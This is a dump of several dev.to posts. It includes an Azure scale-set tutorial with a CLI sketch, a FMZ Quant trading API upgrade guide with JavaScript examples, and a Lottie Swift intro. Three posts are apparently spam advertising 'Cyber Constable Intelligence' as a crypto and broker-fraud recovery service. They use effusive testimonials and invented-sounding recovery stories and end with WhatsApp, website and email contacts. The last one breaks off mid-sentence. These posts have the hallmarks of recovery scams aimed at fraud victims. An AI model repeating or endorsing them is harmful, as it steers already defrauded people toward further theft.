- Log in to Azure - Create a Virtual Machine Scale Set - Clean Up Resources This article steps through using the Azure portal to create a Virtual Machine Scale Set. ## Log in to Azure Sign in to the Azure portal. ## Create a Virtual Machine Scale Set You can deploy a scale set with a Windows Server image or a Linux image such as RHEL, Ubuntu, or SLES. - Type Scale set in the search box. In the results, under Marketplace, select Virtual Machine Scale Sets. - Select Create on the Virtual Machine Scale Sets page, which opens the Create a Virtual Machine Scale Set page. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/awiwotci5r8r27d216ut.PNG) - In the Basics tab, under Project details, make sure the correct subscription is selected and create a new resource group called myVMSSResourceGroup. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p2fbdb6ex7gttdhsgzn1.PNG) - Under Scale set details, set myScaleSet as your scale set name and select a Region that is close to your area. - Under Orchestration, select Uniform. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/apl8pzurg0tolqu29sma.PNG) - Under Instance details, select a marketplace image for Image. Select any of the Supported Distros. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/prorkkjnnfbjd7ghymh6.PNG) - Under Administrator account, configure the admin username and set up an associated password or SSH public key. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nb596l5vwtqkswbubgl0.PNG) A password must be at least 12 characters long and meet three out of the four following complexity requirements: one lower case character, one upper case character, one number, and one special character. If you select a Linux OS disk image, you can instead choose SSH public key. You can use an existing key or create a new one. - Select Next: Disks to move to the disk configuration options and leave the default disk configuration. - Select Next: Networking to move to the networking configuration options. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gttur4qs3gx2ptn50ocx.PNG) - On the Networking page, under Load balancing, select the Use a load balancer checkbox to put the scale set instances behind a load balancer. - In Load balancing options, select Azure load balancer. - In Select a load balancer, select a load balancer or create a new one. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y0db87klio939wp5kzjc.PNG) - For Select a backend pool, select Create new, type myBackendPool, then select Create. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zabfhmoqy69wv1z93n2s.PNG) - Select Next: Scaling to move to the scaling configurations. - On the Scaling page, set the initial instance count field to 5. You can set this number up to 1000. - For the Scaling policy, select Custom autoscale. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jdgdw9t9v7xrdfwkh68q.PNG) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s40hzp1hzcye3qtp7l0b.PNG) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/iark0pgpyc702j16rbtr.PNG) - When you're done, select Review + create. After it passes validation, select Create to deploy the scale set.
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/spvg0an48xn5xjb5rjqx.PNG) ## Clean Up Resources **Delete Resource** When no longer needed, you can delete the resource group, virtual machine, and all related resources. - On the Overview page for the VM, select the Resource group link - At the top of the page for the resource group, select Delete resource group. - A page will open warning you that you are about to delete resources. Type the name of the resource group and select Delete to finish deleting the resources and the resource group
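For completeness, here is a rough Azure CLI equivalent of the portal walkthrough above, ending with the same cleanup step. This is only a sketch: it reuses the names from the article (myVMSSResourceGroup, myScaleSet, myBackendPool), assumes a load balancer name of myLoadBalancer and the Ubuntu2204 image alias, and option names can vary slightly between CLI versions, so check `az vmss create --help` before running it.

```bash
# Create the resource group used throughout the walkthrough
az group create --name myVMSSResourceGroup --location eastus

# Create a Uniform-orchestration scale set of 5 Ubuntu instances
# behind a new load balancer and backend pool
az vmss create \
  --resource-group myVMSSResourceGroup \
  --name myScaleSet \
  --orchestration-mode Uniform \
  --image Ubuntu2204 \
  --instance-count 5 \
  --admin-username azureuser \
  --generate-ssh-keys \
  --lb myLoadBalancer \
  --backend-pool-name myBackendPool

# Clean up: delete the resource group and everything in it
az group delete --name myVMSSResourceGroup --yes --no-wait
```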
emeka_moses_c752f2bdde061
1,912,136
MOST GENUINE BITCOIN,USDT,CRYPTO RECOVERY EXPERT CONTACT CYBER CONSTABLE INTELLIGENCE
In the digital age, where opportunities and risks coexist in equal measure, CYBER CONSTABLE...
0
2024-07-05T02:19:29
https://dev.to/alison_molloy_d99104ab8b6/most-genuine-bitcoinusdtcrypto-recovery-expert-contact-cyber-constable-intelligence-387c
webdev, programming, react, tutorial
In the digital age, where opportunities and risks coexist in equal measure, CYBER CONSTABLE INTELLIGENCE emerges as a guiding force, offering solace and support to those who fall by the intricate web of online scams and frauds. Their name carries weight, synonymous with reliability and resilience in the face of adversityThe recounted tale of financial ruin serves as a poignant reminder of the pervasive threats that loom in the virtual realm. Amidst the chaos, CYBER CONSTABLE INTELLIGENCE stands tall, a beacon of support for those navigating the murky waters of cybercrime. Theirs is a mission defined by unwavering dedication and unwavering resolve, a testament to their commitment to safeguarding the interests of their clients. What distinguishes CYBER CONSTABLE INTELLIGENCE is its unwavering commitment to transparency and accountability. Rooted in a foundation of trust, they approach each case with meticulous care and attention to detail. Theirs is a journey guided by integrity, where the pursuit of justice takes precedence above all else. In the case under scrutiny, CYBER CONSTABLE INTELLIGENCE response was nothing short of remarkable. Armed with a wealth of knowledge and expertise in cybercrime intervention, they embarked on a journey to reclaim what was rightfully theirs. Theirs was a mission defined by precision and determination, a testament to their unwavering commitment to their client's well-being. The road to recovery was fraught with challenges, yet CYBER CONSTABLE INTELLIGENCE navigated it with poise and resilience. Through careful investigation and strategic intervention, they successfully reclaimed every penny of the staggering 10.06 BTC unlawfully seized from the victim. Their triumph was not merely financial but symbolic, a testament to the indomitable spirit of those who refuse to be cowed by adversity. But CYBER CONSTABLE INTELLIGENCE impact extends far beyond mere restitution. By empowering individuals to reclaim their autonomy and security in the digital realm, they sow the seeds of resilience and fortitude. Their unwavering dedication to their client's well-being serves as a beacon of hope in an otherwise uncertain world. This testimonial stands as a testament to the efficacy of CYBER CONSTABLE INTELLIGENCE services. It is a testament to their integrity and unwavering commitment to justice. In a world rife with uncertainty, they stand as a bastion of stability, offering a lifeline to those in need. As we traverse the ever-evolving landscape of cyberspace, CYBER CONSTABLE INTELLIGENCE stands as a steadfast ally, ready to confront the challenges that lie ahead. Their expertise in cybercrime intervention is unparalleled, providing individuals with the reassurance that they are not alone in their fight against online fraudsters. CYBER CONSTABLE INTELLIGENCE is not just a service provider; they are experts for those who have been victimized by online scams and fraud. With their unwavering commitment to justice and integrity, they offer a glimmer of hope amidst the chaos of the digital world. As we continue to navigate the complexities of the digital age, CYBER CONSTABLE INTELLIGENCE stands as a steadfast ally, guiding us toward a safer and more secure prospect. Clink on the link below: WhatsApp info: +1 (252) 378-7611 Website info: https://cyberconstableintelligence. com Email info: support@cyberconstableintelligence. com
alison_molloy_d99104ab8b6
1,912,135
Modularization concept idea
Source: https://www.modularmanagement.com/blog/all-you-need-to-know-about-modularization
0
2024-07-05T02:18:57
https://dev.to/aspsptyd/modularization-concept-idea-fi5
mobdev
Source: https://www.modularmanagement.com/blog/all-you-need-to-know-about-modularization ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ag2ao6r44uobyjstbnjz.png)
aspsptyd
1,912,134
Detailed Explanation of FMZ Quant API Upgrade: Improving the Strategy Design Experience
Preface After 9 years of technical iteration, the FMZ Quant Trading Platform has been...
0
2024-07-05T02:17:45
https://dev.to/fmzquant/detailed-explanation-of-fmz-quant-api-upgrade-improving-the-strategy-design-experience-4onm
fmzquant, api, trading, strategy
## Preface After 9 years of technical iteration, the FMZ Quant Trading Platform has been reconstructed many times, although as users we may not have noticed it. In the past two years, the platform has made a lot of optimizations and upgrades in terms of user experience, including a comprehensive upgrade of the UI interface, enrichment of commonly used quantitative trading tools, and the addition of more backtesting data support. In order to make strategy design more convenient, trading logic clearer, and easier for beginners to get started, the platform has upgraded the API interface used by the strategy. Dockers using the latest version can enable these new features. The platform is still compatible with the old interface calls to the greatest extent. Information about the new features of the API interface has been updated to the API documentation of the FMZ Quant Trading Platform: Syntax Guide: https://www.fmz.com/syntax-guide User Guide: https://www.fmz.com/user-guide So let's take a quick look at which interfaces have been upgraded and what changes are needed to use old strategies to make them compatible with the current API. ## 1. New API interface ### Added exchange.GetTickers function For designing multi-product strategies and full market monitoring strategies, the aggregated market interface is essential. In order to make the strategy easier to develop and avoid reinventing events, the FMZ Quant Trading Platform encapsulates this type of exchange API. If the exchange does not have this interface (individual exchanges), when calling exchange.GetTickers(), an error message is displayed: Not supported. This function does not have any parameters and it will return the real-time market data of all varieties in the exchange's aggregated market interface. It can be simply understood as: exchange.GetTickers() function is the full-featured request version of the exchange.GetTicker() function (look carefully, the difference between these two function names is just the singular and plural). We use the OKX spot simulation environment for testing: ``` function main() { exchange.IO("simulate", true) var tickers = exchange.GetTickers() if (!tickers) { throw "tickers error" } var tbl = {type: "table", title: "test tickers", cols: ["Symbol", "High", "Open", "Low", "Last", "Buy", "Sell", "Time", "Volume"], rows: []} for (var i in tickers) { var ticker = tickers[i] tbl.rows.push([ticker.Symbol, ticker.High, ticker.Open, ticker.Low, ticker.Last, ticker.Buy, ticker.Sell, ticker.Time, ticker.Volume]) } LogStatus("`" + JSON.stringify(tbl) + "`") return tickers.length } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i7ljx9wiae75yru18kuk.png) ### Added exchange.CreateOrder function The newly added exchange.CreateOrder() function is the focus of this upgrade. The biggest function of exchange.CreateOrder() is to specify the type and direction of the order in the function parameters directly. In this way, it no longer depends on the current trading pair, contract code, trading direction and other settings of the system. In multi-species trading order placement scenarios and concurrent scenarios , the design complexity is greatly reduced. The four parameters of the exchange.CreateOrder() function are symbol, side, price, amount. 
Test using OKX futures simulation environment: ``` function main() { exchange.IO("simulate", true) var id1 = exchange.CreateOrder("ETH_USDT.swap", "buy", 3300, 1) var id2 = exchange.CreateOrder("BTC_USDC.swap", "closebuy", 70000, 1) var id3 = exchange.CreateOrder("LTC_USDT.swap", "sell", 110, 1) Log("id1:", id1, ", id2:", id2, ", id3:", id3) } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6kx7k2u3xceg7l9ye2ni.png) In this way, only three exchange.CreateOrder() function calls were used to place three futures orders of different varieties and directions. ### Added exchange.GetHistoryOrders function The newly added exchange.GetHistoryOrders() function is used to obtain the historical transaction orders of a certain variety. The function also requires the support of the exchange interface. For querying historical orders, the interfaces implemented by various exchanges vary greatly: - Some support paginated queries, while others do not; - Some exchanges have a query window period, that is, orders older than N days cannot be queried; - Most exchanges support querying at a specified time, but some do not; Such interfaces are encapsulated with the highest degree of compatibility, and in actual use, attention should be paid to whether they meet the requirements and expectations of the strategy. The detailed function description is not repeated here, you can refer to the syntax manual in the API documentation: > https://www.fmz.com/syntax-guide#fun_exchange.gethistoryorders Tested using the Binance spot trading environment: ``` function main() { var orders = exchange.GetHistoryOrders("ETH_USDT") // Write to chart var tbl = {type: "table", title: "test GetHistoryOrders", cols: ["Symbol", "Id", "Price", "Amount", "DealAmount", "AvgPrice", "Status", "Type", "Offset", "ContractType"], rows: []} for (var order of orders) { tbl.rows.push([order.Symbol, order.Id, order.Price, order.Amount, order.DealAmount, order.AvgPrice, order.Status, order.Type, order.Offset, order.ContractType]) } LogStatus("orders.length:", orders.length, "\n", "`" + JSON.stringify(tbl) + "`") } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/djg368adgc84cawq9s2q.png) ### Added exchange.GetPositions function The old version of the position data acquisition function is exchange.GetPosition(). This upgrade adds a new position acquisition function to better match the function naming semantics: exchange.GetPositions(). At the same time, it is still compatible/upgraded with the GetPosition function. The exchange.GetPositions() function has three calling forms: - exchange.GetPositions() When no parameters are passed, position data is requested based on the current trading pair/contract code settings. - exchange.GetPositions("ETH_USDT.swap") When specifying specific product information (the format of ETH_USDT.swap is defined by the FMZ platform), request the position data of the specific product. - exchange.GetPositions("") Request the exchange position interface to obtain all the current dimension of the position data. 
(Divided according to the exchange interface product dimension) Test using OKX futures simulation environment: ``` function main() { exchange.IO("simulate", true) exchange.SetCurrency("BTC_USDT") exchange.SetContractType("swap") var p1 = exchange.GetPositions() var p2 = exchange.GetPositions("") var tbls = [] for (var positions of [p1, p2]) { var tbl = {type: "table", title: "test GetPosition/GetPositions", cols: ["Symbol", "Amount", "Price", "FrozenAmount", "Type", "Profit", "Margin", "ContractType", "MarginLevel"], rows: []} for (var p of positions) { tbl.rows.push([p.Symbol, p.Amount, p.Price, p.FrozenAmount, p.Type, p.Profit, p.Margin, p.ContractType, p.MarginLevel]) } tbls.push(tbl) } LogStatus("`" + JSON.stringify(tbls) + "`") } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fb9j5rew3oqbnaokc0gb.png) When the parameter passed to the exchange.GetPositions() function is ETH_USDT.swap, the position data of ETH's U-based perpetual contract can be obtained. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vi5hb6sv373rzu1sjmiq.png) When the parameter passed to the exchange.GetPositions() function is an empty string "", the position data of all U-based contracts can be obtained. Isn't it convenient? ## 2. API Interface Upgrade ### Update exchange.GetTicker function The main upgrade of the market function exchange.GetTicker() is to add the symbol parameter. This allows the function to request market data directly according to the product information specified by the parameter without the current trading pair and contract code. It simplifies the code writing process. At the same time, it is still compatible with the call method without passing parameters, and is compatible with the old platform strategy to the greatest extent. The parameter symbol has different formats for spot/futures for the exchange object exchange: - Spot exchange object The format is: AAA_BBB, AAA represents baseCurrency, i.e. trading currency, and BBB represents quoteCurrency, i.e. pricing currency. Currency names are all in uppercase letters. For example: BTC_USDT spot trading pair. - Futures exchange object The format is: AAA_BBB.XXX, AAA represents baseCurrency, i.e. trading currency, BBB represents quoteCurrency, i.e. pricing currency, and XXX represents contract code, such as perpetual contract swap. Currency names are all in uppercase letters, and contract codes are in lowercase. For example: BTC_USDT.swap, BTC's U-based perpetual contract. Tested using the Binance Futures live environment: ``` var symbols = ["BTC_USDT.swap", "BTC_USDT.quarter", "BTC_USD.swap", "BTC_USD.next_quarter", "ETH_USDT.swap"] function main() { exchange.SetCurrency("ETH_USD") exchange.SetContractType("swap") var arr = [] var t = exchange.GetTicker() arr.push(t) for (var symbol of symbols) { var ticker = exchange.GetTicker(symbol) arr.push(ticker) } var tbl = {type: "table", title: "test GetTicker", cols: ["Symbol", "High", "Open", "Low", "Last", "Buy", "Sell", "Time", "Volume"], rows: []} for (var ticker of arr) { tbl.rows.push([ticker.Symbol, ticker.High, ticker.Open, ticker.Low, ticker.Last, ticker.Buy, ticker.Sell, ticker.Time, ticker.Volume]) } LogStatus("`" + JSON.stringify(tbl) + "`") return arr } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0gousoblpku7fwrlj6b1.png) Requesting a batch of market data for a specified symbol has become much simpler. 
### Update exchange.GetDepth function Similar to the GetTicker function, the exchange.GetDepth() function also adds a symbol parameter. This allows us to directly specify the symbol when requesting depth data. Tested using the Binance Futures live environment: ``` function main() { exchange.SetCurrency("LTC_USD") exchange.SetContractType("swap") Log(exchange.GetDepth()) Log(exchange.GetDepth("ETH_USDT.quarter")) Log(exchange.GetDepth("BTC_USD.swap")) } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hylg6tlhjb9snb2jhijc.png) ### Update exchange.GetTrades function Similar to the GetTicker function, the exchange.GetTrades() function also adds a symbol parameter. This allows us to specify the symbol directly when requesting market transaction data. Tested using the Binance Futures live environment: ``` function main() { var arr = [] var arrR = [] var symbols = ["LTC_USDT.swap", "ETH_USDT.quarter", "BTC_USD.swap"] for (var symbol of symbols) { var r = exchange.Go("GetTrades", symbol) arrR.push(r) } for (var r of arrR) { arr.push(r.wait()) } var tbls = [] for (var i = 0; i < arr.length; i++) { var trades = arr[i] var symbol = symbols[i] var tbl = {type: "table", title: symbol, cols: ["Time", "Amount", "Price", "Type", "Id"], rows: []} for (var trade of trades) { tbl.rows.push([trade.Time, trade.Amount, trade.Price, trade.Type, trade.Id]) } tbls.push(tbl) } LogStatus("`" + JSON.stringify(tbls) + "`") } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2i7jrnjlk61qxggpl43v.png) This upgrade is also compatible with the symbol parameter specified by the exchange.Go() function when calling the platform API interface concurrently. ### Update exchange.GetRecords function The GetRecords function has been greatly adjusted this time. In addition to supporting the symbol parameter to directly specify the type information of the requested K-line data, the original period parameter is retained to specify the K-line period, and a limit parameter is added to specify the expected K-line length when requesting. At the same time, it is also compatible with the old version of the GetRecords function that only passes in the period parameter. The calling method of exchange.GetRecords() function is: - exchange.GetRecords() If no parameters are specified, the K-line data of the product corresponding to the current trading pair/contract code is requested. The K-line period is the default K-line period set in the strategy backtesting interface or in live trading. - exchange.GetRecords(60 * 15) When only the K-line period parameter is specified, the K-line data of the product corresponding to the current trading pair/contract code is requested. - exchange.GetRecords("BTC_USDT.swap") When only the product information is specified, the K-line data of the specified product is requested. The K-line period is the default K-line period set in the strategy backtesting interface or in live trading. - exchange.GetRecords("BTC_USDT.swap", 60 * 60) Specify the product information and the specific K-line period to request K-line data. - exchange.GetRecords("BTC_USDT.swap", 60, 1000) Specify the product information, specify the specific K-line period, and specify the expected K-line length to request K-line data. Note that when the limit parameter exceeds the maximum length of a single request from the exchange, a paging request will be generated (i.e., multiple calls to the exchange K-line interface). 
Tested using the Binance Futures live environment: ``` function main() { exchange.SetCurrency("ETH_USDT") exchange.SetContractType("swap") var r1 = exchange.GetRecords() var r2 = exchange.GetRecords(60 * 60) var r3 = exchange.GetRecords("BTC_USDT.swap") var r4 = exchange.GetRecords("BTC_USDT.swap", 60) var r5 = exchange.GetRecords("LTC_USDT.swap", 60, 3000) Log("r1 time difference between adjacent bars:", r1[1].Time - r1[0].Time, "Milliseconds, Bar length:", r1.length) Log("r2 time difference between adjacent bars:", r2[1].Time - r2[0].Time, "Milliseconds, Bar length:", r2.length) Log("r3 time difference between adjacent bars:", r3[1].Time - r3[0].Time, "Milliseconds, Bar length:", r3.length) Log("r4 time difference between adjacent bars:", r4[1].Time - r4[0].Time, "Milliseconds, Bar length:", r4.length) Log("r5 time difference between adjacent bars:", r5[1].Time - r5[0].Time, "Milliseconds, Bar length:", r5.length) } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yc0tpifyn4m3a15zrkj0.png) ### Update exchange.GetOrders function The GetOrders function also adds symbol parameters, which can specify the type of the current unfinished orders (pending orders) directly to be queried; it also supports querying all pending orders (regardless of type); and is compatible with the original calling method. The exchange.GetOrders() function can be called in the following ways: - exchange.GetOrders() Query all uncompleted orders for the current trading pair/contract code. - exchange.GetOrders("BTC_USDT.swap") Query all outstanding orders for USDT-margined perpetual contracts on BTC. - exchange.GetOrders("") Query all unfinished orders in the current dimension of the exchange (divided according to the exchange API interface dimension). Test using OKX futures simulation environment: ``` function main() { exchange.IO("simulate", true) exchange.SetCurrency("BTC_USDT") exchange.SetContractType("swap") // Write to chart var tbls = [] for (var symbol of ["null", "ETH_USDT.swap", ""]) { var tbl = {type: "table", title: symbol, cols: ["Symbol", "Id", "Price", "Amount", "DealAmount", "AvgPrice", "Status", "Type", "Offset", "ContractType"], rows: []} var orders = null if (symbol == "null") { orders = exchange.GetOrders() } else { orders = exchange.GetOrders(symbol) } for (var order of orders) { tbl.rows.push([order.Symbol, order.Id, order.Price, order.Amount, order.DealAmount, order.AvgPrice, order.Status, order.Type, order.Offset, order.ContractType]) } tbls.push(tbl) } LogStatus("`" + JSON.stringify(tbls) + "`") } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ahsipyoonkmgf91o2e4q.png) When no parameters are passed, the default request is for all uncompleted pending orders of the current BTC_USDT trading pair and swap perpetual contract. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cdd6en3nru2cmy1jld97.png) When the ETH_USDT.swap parameter is specified, all outstanding pending orders of the perpetual contract of the ETH_USDT trading pair are requested. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tqbsr478v311d7oivljj.png) When an empty string "" is passed, all uncompleted orders of all USDT-margined contracts are requested. ### Update exchange.GetPosition function It is still compatible with the old position acquisition function naming, and also adds the symbol parameter, which can specify the type information of the specific requested position data. 
The usage of this function is exactly the same as exchange.GetPositions(). ### Update exchange.IO function For exchange.IO("api", ...) function calls, all exchange objects have been upgraded to support the direct passing of complete request addresses. For example, if you want to call the OKX interface: > // GET https://www.okx.com /api/v5/account/max-withdrawal ccy: BTC Supports direct writing to the base address https://www.okx.com without having to switch the base address first and then call the IO function. Test using OKX futures simulation environment: ``` function main() { exchange.IO("simulate", true) return exchange.IO("api", "GET", "https://www.okx.com/api/v5/account/max-withdrawal", "ccy=BTC") } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/w4xzimxf2z8fbamvt130.png) ## 3. API Interface Impact ### Affects exchange.GetOrder function This upgrade mainly affects the parameter id of the exchange.GetOrder(id) function. The id parameter is changed from the original exchange order id to a string format containing the trading product. All encapsulated order IDs on the FMZ platform are in this format. For example: - The original order Id of the exchange defined in the exchange order is: 123456 Before this upgrade, if you want to call the GetOrder function, the order Id passed in is 123456. - The product code named by the exchange defined in the exchange order: BTC-USDT. Note that this refers to the trading product code named by the exchange, not the trading pair defined by the FMZ platform. After this upgrade, the format of the parameter id that needs to be passed into the exchange.GetOrder(id) function is adjusted to: BTC-USDT,123456. First, let me explain why this design is done: Because the CreateOrder function has been upgraded to specify the type of order directly (the type of order placed may be different from the currently set trading pair and contract code). If the returned order ID does not contain the type information, then this order ID will be unusable. Because when checking the order, we don't know what type (contract) the order is for. Most exchanges require the specification of parameters describing the type code when checking and canceling orders. How to be compatible with this impact: If you use the exchange.IO function to call the exchange order interface directly to place an order, the return value generally contains the exchange's original symbol (product code) and the original order id. Then concatenating the two with English commas will be the order ID that complies with the definition of the FMZ platform. Similarly, if you use the FMZ platform encapsulated order interface to place an order, since the beginning of the order ID is the trading product code, if you need to use the original order ID, just delete the product code and comma. ### Affects exchange.CancelOrder function The impact of this upgrade on the exchange.CancelOrder() function is the same as the exchange.GetOrder() function. ### Affects exchange.Buy function The impact of this upgrade on the exchange.Buy() function is the same as the exchange.GetOrder() function. The order ID returned by the exchange.Buy() function is a new structure, for example, the ID returned when placing a futures order on the OKX exchange is: LTC-USDT-SWAP,1578360858053058560. ### Affects exchange.Sell function The impact of this upgrade on the exchange.Sell() function is the same as the exchange.GetOrder() function. 
The order ID returned by the exchange.Sell() function is a new structure, for example, the ID returned when placing a futures order on the OKX exchange is: ETH-USDT-SWAP,1578360832820125696. ## 4. Structural Adjustment ### Ticker Structure This update adds a Symbol field to the Ticker structure, which records the market information of the current Ticker structure. The format of this field is exactly the same as the symbol parameter format of the exchange.GetTicker() function. ### Order Structure This update adds a Symbol field to the Order structure, and the format of this field is exactly the same as the symbol parameter format of the exchange.GetTicker() function. This update also modifies the Id field of the Order structure, recording the product information and original order information in the new order ID format. Refer to the description of the order ID in the exchange.GetOrder() function, which will not be repeated here. ### Position Structure This update adds a Symbol field to the Position structure. The format of this field is exactly the same as the symbol parameter format of the exchange.GetTicker() function. ## 5. Backtesting system In order to meet user needs, this upgrade will first be compatible with the live trading, and the backtesting system will be adapted within a week. If individual strategy codes are affected, please follow the instructions in this article to make changes and adaptations. From: https://www.fmz.com/bbs-topic/10456
fmzquant
1,911,097
Easy implement lottie animation in Swift
Have you heard about Lottie? Lottie is an open-source animation library created by Airbnb, and it’s a...
0
2024-07-05T02:16:46
https://dev.to/omerta_rom/easy-implement-lottie-animation-in-swift-30oi
swift, ios
Have you heard about Lottie? Lottie is an open-source animation library created by Airbnb, and it's a game-changer for adding high-quality animations to your app. Whether you want to provide visual feedback, add some personality, or simply make your app more engaging, Lottie has got you covered. The image below is an example of a Lottie animation asset. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0h0am77art463wk7i59v.gif) In this guide, I'll walk you through how to sprinkle some Lottie magic into your Swift project. The first step is to add the Lottie library to your iOS project. You can download the library from the GitHub link below. https://github.com/airbnb/lottie-ios You can pull the Lottie GitHub repo and include Lottie.xcodeproj to build a dynamic or static library. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/n5p1wykqoz4t0iklzefl.png)
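Once the library is linked, wiring an animation into a view controller takes only a few lines. The snippet below is a minimal sketch, assuming a Lottie JSON file named "loading" has been added to the app bundle and that you are on Lottie 4.x, where the view type is `LottieAnimationView` (earlier releases call it `AnimationView`):

```swift
import UIKit
import Lottie

final class LoadingViewController: UIViewController {

    // "loading" is an assumed name for a Lottie JSON asset in the app bundle
    private let animationView = LottieAnimationView(name: "loading")

    override func viewDidLoad() {
        super.viewDidLoad()

        // Size and position the animation, then add it to the view hierarchy
        animationView.frame = CGRect(x: 0, y: 0, width: 200, height: 200)
        animationView.center = view.center
        animationView.contentMode = .scaleAspectFit

        // Keep looping until the view is dismissed
        animationView.loopMode = .loop
        view.addSubview(animationView)
        animationView.play()
    }
}
```

If you installed Lottie via Swift Package Manager or CocoaPods instead of the Xcode project, the import and API are the same.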
omerta_rom
1,912,133
TRUSTED CRYPTOCURRENCY AND ETH/USDT RECOVERY EXPERT CONSULT CYBER CONSTABLE INTELLIGENCE
I write this with a heavy heart and a sense of responsibility, hoping to spare others from the...
0
2024-07-05T02:13:48
https://dev.to/russell_howard_ecc03a6cb5/trusted-cryptocurrency-and-ethusdt-recovery-expert-consult-cyber-constable-intelligence-5a6c
I write this with a heavy heart and a sense of responsibility, hoping to spare others from the anguish and financial devastation I endured at the hands of a deceitful brokerage firm. For four long years, I entrusted my hard-earned savings and aspirations for financial security to this company, only to be manipulated and ultimately betrayed. It all began with what seemed like a promising opportunity in online trading. The allure of potential profits and the promise of expert guidance drew me in, and I began my journey with optimism and cautious enthusiasm. However, as time passed, I began to notice unsettling patterns. My assigned account manager, entrusted with guiding my investments, consistently steered me towards trades that ended in substantial losses. Initially, I attributed these setbacks to market volatility and the inherent risks of trading. Yet, upon closer scrutiny and painful realization, I discovered the truth—I was being manipulated for the benefit of my account manager and the company. Each loss I incurred translated into gains for them, amplifying their profits at my expense. Despite these revelations, I persisted, hoping that prudent decision-making and diligence would eventually turn the tide in my favor. The turning point came when, after making a substantial deposit of £120,000, my account was summarily closed, and all avenues for withdrawal were abruptly restricted. It was a devastating blow, compounded by the callousness of losing my entire fortune during the global pandemic—a time already fraught with uncertainty and hardship. The sense of betrayal and helplessness was profound, prompting me to seek recourse and justice. In my desperate search for answers and restitution, I fortuitously stumbled upon Cyber Constable Intelligence—an organization specializing in recovering funds from deceitful brokers and financial fraudsters. Skeptical yet hopeful, I reached out to them, recounting my harrowing ordeal and the egregious actions of the brokerage firm that had shattered my financial stability. Cyber Constable Intelligence distinguished themselves with professionalism, empathy, and a steadfast commitment to righting the wrongs inflicted upon me. They listened attentively to my story, providing solace and reassurance amidst the turmoil. Their team of experts, equipped with profound expertise in financial fraud investigation and digital forensics, meticulously analyzed my case. Cyber Constable Intelligence embarked on a rigorous investigation, leveraging advanced technological tools and their extensive network of resources to trace the convoluted path of my funds. They unraveled the intricate web of deception woven by the brokerage firm, compiling irrefutable evidence to substantiate my claims and support legal action if necessary. Throughout the process, they maintained transparent communication, keeping me informed of their progress and guiding me through each step of the recovery journey. In a testament to their expertise and unwavering dedication, Cyber Constable Intelligence succeeded in recovering a significant portion of my lost funds. The return of these funds was not merely a financial relief but a triumph of justice over deceit—a beacon of hope amidst the darkness of financial exploitation. Thanks Cyber Constable Intelligence for their tireless advocacy and unwavering support. They not only restored my financial security but also empowered me to expose the deceptive practices of the brokerage firm, aiming to prevent others from falling victim to similar schemes. 
I urge anyone navigating the treacherous waters of online trading to exercise caution and vigilance. Trustworthy allies like Cyber Constable Intelligence stand ready to assist those who have been wronged by fraudulent practices. If you find yourself entangled in a similar predicament—betrayed by false promises and grappling with substantial losses—do not hesitate to seek their guidance and expertise. Cyber Constable Intelligence embodies integrity, resilience, and a steadfast commitment to client welfare—a beacon of hope for those seeking restitution and justice in the digital age. Contact Cyber Constable Intelligence today and take the first step towards reclaiming your financial security and peace of mind. Your story deserves to be heard, and your rights deserve to be upheld. Get in touch with the info below: WhatsApp info: +1 (252) 378-7611 Website info: https://cyberconstableintelligence. com Email info: (support(@)cyberconstableintelligence). com
russell_howard_ecc03a6cb5
1,912,131
BEST CRYPTOCURRENCY RECOVERY EXPERT CONTACT CYBER CONSTABLE INTELLIGENCE
Experiencing a significant financial loss due to falling prey to a fraudulent scheme can be a deeply...
0
2024-07-05T02:06:22
https://dev.to/becky_lawhon_9898910d0431/best-cryptocurrency-recovery-expert-contact-cyber-constable-intelligence-3905
webdev, javascript, programming, tutorial
Experiencing a significant financial loss due to falling prey to a fraudulent scheme can be a deeply distressing and demoralizing ordeal. I found myself in this unfortunate situation after being lured in by the false promises of a platform called vipfx.com, which claimed to offer substantial returns on Bitcoin investments. Introduced to this platform by a friend, I naively trusted their recommendations without conducting thorough research, leading to a substantial loss of funds and a prolonged period of despair. Fortunately, my fortunes took a positive turn when I was introduced to Cyber Constable Intelligence, a reputable company specializing in recovering assets lost to financial fraud. With the expert assistance of their team, I was able to navigate the complex process of reclaiming my stolen Bitcoin with remarkable efficiency and success. The support and guidance provided by Cyber Constable Intelligence were attentive, compassionate, and dedicated to helping me recover my bitcoins. One aspect that stood out during my experience with Cyber Constable Intelligence was their swift and effective handling of my case. Within a short span of two weeks, they managed to successfully retrieve my stolen BTC from the perpetrators behind the vipfx.com scam. Their prompt action to deliver results without unnecessary delays or complications was truly commendable. This rapid resolution not only alleviated the financial burden I was facing but also provided a sense of closure and justice. Throughout the recovery process, Cyber Constable Intelligence demonstrated a high level of expertise that inspired trust and confidence. They maintained clear communication, providing regular updates on the progress of my case and addressing any queries or concerns I had with transparency and 